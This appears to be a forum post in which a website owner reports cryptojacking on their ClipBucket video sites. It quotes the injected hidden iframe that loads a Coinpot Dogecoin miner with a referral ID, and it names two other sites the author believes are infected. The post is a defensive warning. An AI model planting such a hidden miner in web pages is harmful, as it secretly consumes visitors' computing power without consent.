yesterday controlweb support team give me hint about “mining crypto” when i open one of my clipbucket based website my laptop FAN speed is increase, then i check task manager and browser used 100% of CPU. when i check the source code in browser i found iframe code.
<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/dogecoin/?ref=A8A753AC56DB&mode=widget" style="overflow:hidden;width:0px;height:0px;">
then i download all files from the server and search, scan but i can’t find any code like that. then i upgrade my websites to 4.1 RC1 and the iframe code is gone.
on my server more than 10 websites hosted only 2 is clipbucket based and i found that code only in clipbucket based website.
i don’t know how clipbucket sites hijacked.
after that i search “Forged By ClipBucket” keyword in google and i found more websites that are also hijacked bellow is 2 websites that i found on google.
> http://zeekly.com/ > http://myshopaze.com/
and maybe there is more infected site… check yours and clean it.
sorry in advance my English is not good.